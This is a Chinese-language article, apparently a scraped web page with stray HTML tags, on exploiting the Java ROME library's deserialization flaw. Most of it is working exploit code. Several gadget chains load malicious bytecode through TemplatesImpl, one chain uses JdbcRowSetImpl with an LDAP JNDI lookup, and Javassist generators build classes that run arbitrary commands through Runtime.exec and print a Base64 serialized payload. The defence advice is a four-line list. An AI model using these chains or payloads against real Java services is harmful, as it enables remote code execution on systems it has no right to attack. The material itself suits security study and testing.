Java反序列化之ROME反序列化漏洞分析与利用<\/h1>

1. ROME库概述<\/h2>
ROME是一个用于处理和操作XML格式数据的Java工具库，主要功能包括：<\/p>
将XML数据转换为Java对象<\/li>
将Java对象转换为XML数据<\/li>
提供ToStringBean类，用于对Java Bean进行深入的toString操作<\/li> <\/ul>
2. 环境依赖<\/h2>
<dependencies><\/span>
<\/span><\/span>    <dependency><\/span>
<\/span><\/span>        <groupId><\/span>rome<\/groupId><\/span>
<\/span><\/span>        <artifactId><\/span>rome<\/artifactId><\/span>
<\/span><\/span>        <version><\/span>1.0<\/version><\/span>
<\/span><\/span>    <\/dependency><\/span>
<\/span><\/span><\/dependencies><\/span>
<\/span><\/span><\/code><\/pre>3. 关键类分析<\/h2>
3.1 ToStringBean类<\/h3>
ToStringBean类是ROME反序列化漏洞的核心，其toString方法会反射调用对象的getter方法：<\/p>
private<\/span> String toString<\/span>(<\/span>String prefix)<\/span> {<\/span>
<\/span><\/span>    StringBuffer sb =<\/span> new<\/span> StringBuffer(<\/span>128<\/span>);<\/span>
<\/span><\/span>    try<\/span> {<\/span>
<\/span><\/span>        \/\/ 获取getter方法
<\/span><\/span><\/span><\/span>        PropertyDescriptor[]<\/span> pds =<\/span> BeanIntrospector.<\/span>getPropertyDescriptors<\/span>(<\/span>this<\/span>.<\/span>_beanClass<\/span>);<\/span>
<\/span><\/span>        if<\/span> (<\/span>pds !=<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>            for<\/span>(<\/span>int<\/span> i =<\/span> 0<\/span>;<\/span> i <<\/span> pds.<\/span>length<\/span>;<\/span> ++<\/span>i)<\/span> {<\/span>
<\/span><\/span>                String pName =<\/span> pds[<\/span>i].<\/span>getName<\/span>();<\/span>
<\/span><\/span>                Method pReadMethod =<\/span> pds[<\/span>i].<\/span>getReadMethod<\/span>();<\/span>
<\/span><\/span>                if<\/span> (<\/span>pReadMethod !=<\/span> null<\/span> &&<\/span> pReadMethod.<\/span>getDeclaringClass<\/span>()<\/span> !=<\/span> Object.<\/span>class<\/span> &&<\/span> pReadMethod.<\/span>getParameterTypes<\/span>().<\/span>length<\/span> ==<\/span> 0<\/span>)<\/span> {<\/span>
<\/span><\/span>                    \/\/ 执行getter方法
<\/span><\/span><\/span><\/span>                    Object value =<\/span> pReadMethod.<\/span>invoke<\/span>(<\/span>this<\/span>.<\/span>_obj<\/span>,<\/span> NO_PARAMS);<\/span>
<\/span><\/span>                    this<\/span>.<\/span>printProperty<\/span>(<\/span>sb,<\/span> prefix +<\/span> "."<\/span> +<\/span> pName,<\/span> value);<\/span>
<\/span><\/span>                }<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span> ...<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>3.2 利用方式<\/h3>
通过ToStringBean的toString方法可以调用TemplatesImpl的getOutputProperties方法，触发恶意代码执行：<\/p>
ToStringBean toStringBean =<\/span> new<\/span> ToStringBean(<\/span>Templates.<\/span>class<\/span>,<\/span> templates);<\/span>
<\/span><\/span><\/code><\/pre>4. 漏洞利用链<\/h2>
4.1 EqualsBean利用链<\/h3>
public<\/span> class<\/span> RomeEqualsBean<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        \/\/ 创建恶意TemplatesImpl对象
<\/span><\/span><\/span><\/span>        byte<\/span>[]<\/span> code =<\/span> Files.<\/span>readAllBytes<\/span>(<\/span>Paths.<\/span>get<\/span>(<\/span>"Demo.class"<\/span>));<\/span>
<\/span><\/span>        byte<\/span>[][]<\/span> codes =<\/span> {<\/span>code};<\/span>
<\/span><\/span>        TemplatesImpl templates =<\/span> new<\/span> TemplatesImpl();<\/span>
<\/span><\/span>        setValue(<\/span>templates,<\/span>"_name"<\/span>,<\/span>"Ic4F1ame"<\/span>);<\/span>
<\/span><\/span>        setValue(<\/span>templates,<\/span> "_tfactory"<\/span>,<\/span> new<\/span> TransformerFactoryImpl());<\/span>
<\/span><\/span>        setValue(<\/span>templates,<\/span>"_bytecodes"<\/span>,<\/span>codes);<\/span>
<\/span><\/span>
<\/span><\/span>        \/\/ 构造ToStringBean
<\/span><\/span><\/span><\/span>        ToStringBean toStringBean =<\/span> new<\/span> ToStringBean(<\/span>Templates.<\/span>class<\/span>,<\/span>new<\/span> ConstantTransformer(<\/span>1<\/span>));<\/span>
<\/span><\/span>        EqualsBean equalsBean =<\/span> new<\/span> EqualsBean(<\/span>ToStringBean.<\/span>class<\/span>,<\/span>toStringBean);<\/span>
<\/span><\/span>
<\/span><\/span>        \/\/ 使用HashMap触发
<\/span><\/span><\/span><\/span>        HashMap<<\/span>Object,<\/span>Object><\/span> hashMap =<\/span> new<\/span> HashMap<>();<\/span>
<\/span><\/span>        hashMap.<\/span>put<\/span>(<\/span>equalsBean,<\/span>"123"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>        \/\/ 修改_obj为恶意对象
<\/span><\/span><\/span><\/span>        Field field =<\/span> toStringBean.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"_obj"<\/span>);<\/span>
<\/span><\/span>        field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        field.<\/span>set<\/span>(<\/span>toStringBean,<\/span>templates);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>4.2 ObjectBean利用链<\/h3>
public<\/span> class<\/span> RomeObjectBean<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        \/\/ 创建恶意TemplatesImpl对象
<\/span><\/span><\/span><\/span>        byte<\/span>[]<\/span> code =<\/span> Files.<\/span>readAllBytes<\/span>(<\/span>Paths.<\/span>get<\/span>(<\/span>"Demo.class"<\/span>));<\/span>
<\/span><\/span>        byte<\/span>[][]<\/span> codes =<\/span> {<\/span>code};<\/span>
<\/span><\/span>        TemplatesImpl templates =<\/span> new<\/span> TemplatesImpl();<\/span>
<\/span><\/span>        setValue(<\/span>templates,<\/span>"_name"<\/span>,<\/span>"Ic4F1ame"<\/span>);<\/span>
<\/span><\/span>        setValue(<\/span>templates,<\/span> "_tfactory"<\/span>,<\/span> new<\/span> TransformerFactoryImpl());<\/span>
<\/span><\/span>        setValue(<\/span>templates,<\/span>"_bytecodes"<\/span>,<\/span>codes);<\/span>
<\/span><\/span>
<\/span><\/span>        \/\/ 构造ToStringBean
<\/span><\/span><\/span><\/span>        ToStringBean toStringBean =<\/span> new<\/span> ToStringBean(<\/span>Templates.<\/span>class<\/span>,<\/span>new<\/span> ConstantTransformer(<\/span>1<\/span>));<\/span>
<\/span><\/span>        ObjectBean objectBean =<\/span> new<\/span> ObjectBean(<\/span>ToStringBean.<\/span>class<\/span>,<\/span>toStringBean);<\/span>
<\/span><\/span>
<\/span><\/span>        \/\/ 使用HashMap触发
<\/span><\/span><\/span><\/span>        HashMap<<\/span>Object,<\/span>Object><\/span> hashMap =<\/span> new<\/span> HashMap<>();<\/span>
<\/span><\/span>        hashMap.<\/span>put<\/span>(<\/span>objectBean,<\/span>"123"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>        \/\/ 修改_obj为恶意对象
<\/span><\/span><\/span><\/span>        Field field =<\/span> toStringBean.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"_obj"<\/span>);<\/span>
<\/span><\/span>        field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        field.<\/span>set<\/span>(<\/span>toStringBean,<\/span>templates);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>4.3 HashTable利用链<\/h3>
public<\/span> class<\/span> RomeHashTable<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        \/\/ 创建恶意TemplatesImpl对象
<\/span><\/span><\/span><\/span>        byte<\/span>[]<\/span> code =<\/span> Files.<\/span>readAllBytes<\/span>(<\/span>Paths.<\/span>get<\/span>(<\/span>"Demo.class"<\/span>));<\/span>
<\/span><\/span>        byte<\/span>[][]<\/span> codes =<\/span> {<\/span>code};<\/span>
<\/span><\/span>        TemplatesImpl templates =<\/span> new<\/span> TemplatesImpl();<\/span>
<\/span><\/span>        setValue(<\/span>templates,<\/span>"_name"<\/span>,<\/span>"Ic4F1ame"<\/span>);<\/span>
<\/span><\/span>        setValue(<\/span>templates,<\/span> "_tfactory"<\/span>,<\/span> new<\/span> TransformerFactoryImpl());<\/span>
<\/span><\/span>        setValue(<\/span>templates,<\/span>"_bytecodes"<\/span>,<\/span>codes);<\/span>
<\/span><\/span>
<\/span><\/span>        \/\/ 构造ToStringBean
<\/span><\/span><\/span><\/span>        ToStringBean toStringBean =<\/span> new<\/span> ToStringBean(<\/span>Templates.<\/span>class<\/span>,<\/span>new<\/span> ConstantTransformer(<\/span>1<\/span>));<\/span>
<\/span><\/span>        ObjectBean objectBean =<\/span> new<\/span> ObjectBean(<\/span>ToStringBean.<\/span>class<\/span>,<\/span>toStringBean);<\/span>
<\/span><\/span>
<\/span><\/span>        \/\/ 使用HashTable触发
<\/span><\/span><\/span><\/span>        Hashtable hashtable =<\/span> new<\/span> Hashtable();<\/span>
<\/span><\/span>        hashtable.<\/span>put<\/span>(<\/span>objectBean,<\/span>"123"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>        \/\/ 修改_obj为恶意对象
<\/span><\/span><\/span><\/span>        Field field =<\/span> toStringBean.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"_obj"<\/span>);<\/span>
<\/span><\/span>        field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        field.<\/span>set<\/span>(<\/span>toStringBean,<\/span>templates);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>4.4 BadAttributeValueExpException利用链<\/h3>
public<\/span> class<\/span> RomeBdAttribute<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        \/\/ 创建恶意TemplatesImpl对象
<\/span><\/span><\/span><\/span>        byte<\/span>[]<\/span> code =<\/span> Files.<\/span>readAllBytes<\/span>(<\/span>Paths.<\/span>get<\/span>(<\/span>"Demo.class"<\/span>));<\/span>
<\/span><\/span>        byte<\/span>[][]<\/span> codes =<\/span> {<\/span>code};<\/span>
<\/span><\/span>        TemplatesImpl templates =<\/span> new<\/span> TemplatesImpl();<\/span>
<\/span><\/span>        setValue(<\/span>templates,<\/span>"_name"<\/span>,<\/span>"Ic4F1ame"<\/span>);<\/span>
<\/span><\/span>        setValue(<\/span>templates,<\/span> "_tfactory"<\/span>,<\/span> new<\/span> TransformerFactoryImpl());<\/span>
<\/span><\/span>        setValue(<\/span>templates,<\/span>"_bytecodes"<\/span>,<\/span>codes);<\/span>
<\/span><\/span>
<\/span><\/span>        \/\/ 构造ToStringBean
<\/span><\/span><\/span><\/span>        ToStringBean toStringBean =<\/span> new<\/span> ToStringBean(<\/span>Templates.<\/span>class<\/span>,<\/span>templates);<\/span>
<\/span><\/span>
<\/span><\/span>        \/\/ 使用BadAttributeValueExpException触发
<\/span><\/span><\/span><\/span>        BadAttributeValueExpException badAttributeValueExpException =<\/span> new<\/span> BadAttributeValueExpException(<\/span>null<\/span>);<\/span>
<\/span><\/span>        Class Bv =<\/span> Class.<\/span>forName<\/span>(<\/span>"javax.management.BadAttributeValueExpException"<\/span>);<\/span>
<\/span><\/span>        Field val =<\/span> Bv.<\/span>getDeclaredField<\/span>(<\/span>"val"<\/span>);<\/span>
<\/span><\/span>        val.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        val.<\/span>set<\/span>(<\/span>badAttributeValueExpException,<\/span>toStringBean);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>4.5 JdbcRowSetImpl利用链（出网利用）<\/h3>
public<\/span> class<\/span> RomeJdbc<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        \/\/ 创建JdbcRowSetImpl对象
<\/span><\/span><\/span><\/span>        JdbcRowSetImpl jdbcRowset =<\/span> new<\/span> JdbcRowSetImpl();<\/span>
<\/span><\/span>        String url =<\/span> "ldap:\/\/127.0.0.1:8085\/zARQtFym"<\/span>;<\/span>
<\/span><\/span>        jdbcRowset.<\/span>setDataSourceName<\/span>(<\/span>url);<\/span>
<\/span><\/span>
<\/span><\/span>        \/\/ 构造ToStringBean
<\/span><\/span><\/span><\/span>        ToStringBean toStringBean =<\/span> new<\/span> ToStringBean(<\/span>JdbcRowSetImpl.<\/span>class<\/span>,<\/span>new<\/span> ConstantTransformer(<\/span>1<\/span>));<\/span>
<\/span><\/span>        EqualsBean equalsBean =<\/span> new<\/span> EqualsBean(<\/span>ToStringBean.<\/span>class<\/span>,<\/span>toStringBean);<\/span>
<\/span><\/span>
<\/span><\/span>        \/\/ 使用HashMap触发
<\/span><\/span><\/span><\/span>        HashMap<<\/span>Object,<\/span>Object><\/span> hashMap =<\/span> new<\/span> HashMap<>();<\/span>
<\/span><\/span>        hashMap.<\/span>put<\/span>(<\/span>equalsBean,<\/span>"123"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>        \/\/ 修改_obj为恶意对象
<\/span><\/span><\/span><\/span>        Field field =<\/span> toStringBean.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"_obj"<\/span>);<\/span>
<\/span><\/span>        field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        field.<\/span>set<\/span>(<\/span>toStringBean,<\/span>jdbcRowset);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>5. 缩短Payload技术<\/h2>
5.1 使用Javassist生成恶意类<\/h3>
public<\/span> class<\/span> GetShellCode<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> byte<\/span>[]<\/span> getTemplatesImpl<\/span>(<\/span>String cmd)<\/span> {<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            ClassPool pool =<\/span> ClassPool.<\/span>getDefault<\/span>();<\/span>
<\/span><\/span>            CtClass ctClass =<\/span> pool.<\/span>makeClass<\/span>(<\/span>"A"<\/span>);<\/span>
<\/span><\/span>            CtClass superClass =<\/span> pool.<\/span>get<\/span>(<\/span>"com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet"<\/span>);<\/span>
<\/span><\/span>            ctClass.<\/span>setSuperclass<\/span>(<\/span>superClass);<\/span>
<\/span><\/span>            CtConstructor constructor =<\/span> CtNewConstructor.<\/span>make<\/span>(<\/span>
<\/span><\/span>                "public A(){Runtime.getRuntime().exec(\""<\/span> +<\/span> cmd +<\/span> "\");}"<\/span>,<\/span> 
<\/span><\/span>                ctClass
<\/span><\/span>            );<\/span>
<\/span><\/span>            ctClass.<\/span>addConstructor<\/span>(<\/span>constructor);<\/span>
<\/span><\/span>            byte<\/span>[]<\/span> bytes =<\/span> ctClass.<\/span>toBytecode<\/span>();<\/span>
<\/span><\/span>            ctClass.<\/span>defrost<\/span>();<\/span>
<\/span><\/span>            return<\/span> bytes;<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span>
<\/span><\/span>            e.<\/span>printStackTrace<\/span>();<\/span>
<\/span><\/span>            return<\/span> new<\/span> byte<\/span>[]{};<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>5.2 优化后的利用链<\/h3>
public<\/span> class<\/span> RomeEqualsShorter<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        TemplatesImpl templatesimpl =<\/span> new<\/span> TemplatesImpl();<\/span>
<\/span><\/span>        setValue(<\/span>templatesimpl,<\/span>"_name"<\/span>,<\/span>"a"<\/span>);<\/span>
<\/span><\/span>        setValue(<\/span>templatesimpl,<\/span>"_bytecodes"<\/span>,<\/span>new<\/span> byte<\/span>[][]<\/span> {<\/span>genPayload(<\/span>"calc"<\/span>)});<\/span>
<\/span><\/span>
<\/span><\/span>        ToStringBean toStringBean =<\/span> new<\/span> ToStringBean(<\/span>Templates.<\/span>class<\/span>,<\/span>templatesimpl);<\/span>
<\/span><\/span>        EqualsBean equalsBean =<\/span> new<\/span> EqualsBean(<\/span>ToStringBean.<\/span>class<\/span>,<\/span>toStringBean);<\/span>
<\/span><\/span>
<\/span><\/span>        HashMap<<\/span>Object,<\/span>Object><\/span> hashMap =<\/span> new<\/span> HashMap<>();<\/span>
<\/span><\/span>        hashMap.<\/span>put<\/span>(<\/span>equalsBean,<\/span> "1"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>        \/\/ 序列化输出
<\/span><\/span><\/span><\/span>        ByteArrayOutputStream barr =<\/span> new<\/span> ByteArrayOutputStream();<\/span>
<\/span><\/span>        ObjectOutputStream oos =<\/span> new<\/span> ObjectOutputStream(<\/span>barr);<\/span>
<\/span><\/span>        oos.<\/span>writeObject<\/span>(<\/span>hashMap);<\/span>
<\/span><\/span>        oos.<\/span>close<\/span>();<\/span>
<\/span><\/span>        System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>new<\/span> String(<\/span>Base64.<\/span>getEncoder<\/span>().<\/span>encode<\/span>(<\/span>barr.<\/span>toByteArray<\/span>())));<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>
<\/span><\/span>    public<\/span> static<\/span> byte<\/span>[]<\/span> genPayload<\/span>(<\/span>String cmd)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        ClassPool pool =<\/span> ClassPool.<\/span>getDefault<\/span>();<\/span>
<\/span><\/span>        CtClass clazz =<\/span> pool.<\/span>makeClass<\/span>(<\/span>"a"<\/span>);<\/span>
<\/span><\/span>        CtClass superClass =<\/span> pool.<\/span>get<\/span>(<\/span>AbstractTranslet.<\/span>class<\/span>.<\/span>getName<\/span>());<\/span>
<\/span><\/span>        clazz.<\/span>setSuperclass<\/span>(<\/span>superClass);<\/span>
<\/span><\/span>        CtConstructor constructor =<\/span> new<\/span> CtConstructor(<\/span>new<\/span> CtClass[]{},<\/span> clazz);<\/span>
<\/span><\/span>        constructor.<\/span>setBody<\/span>(<\/span>"Runtime.getRuntime().exec(\""<\/span>+<\/span>cmd+<\/span>"\");"<\/span>);<\/span>
<\/span><\/span>        clazz.<\/span>addConstructor<\/span>(<\/span>constructor);<\/span>
<\/span><\/span>        return<\/span> clazz.<\/span>toBytecode<\/span>();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>6. 防御措施<\/h2>

升级ROME库到最新版本<\/li>
对反序列化操作进行白名单控制<\/li>
使用安全管理器限制危险操作<\/li>
对输入数据进行严格校验<\/li>
<\/ol>
7. 参考链接<\/h2>

ROME反序列化漏洞分析<\/a><\/li>
ROME反序列化利用链详解<\/a><\/li>
ROME反序列化漏洞利用<\/a><\/li>
<\/ol>
Java反序列化之ROME反序列化漏洞分析与利用<\/h1>

3. 关键类分析<\/h2>

4. 漏洞利用链<\/h2>

5. 缩短Payload技术<\/h2>

7. 参考链接<\/h2> ROME反序列化漏洞分析<\/a><\/li> ROME反序列化利用链详解<\/a><\/li> ROME反序列化漏洞利用<\/a><\/li> <\/ol>

7. 参考链接<\/h2>

ROME反序列化漏洞分析<\/a><\/li>
ROME反序列化利用链详解<\/a><\/li>
ROME反序列化漏洞利用<\/a><\/li> <\/ol>
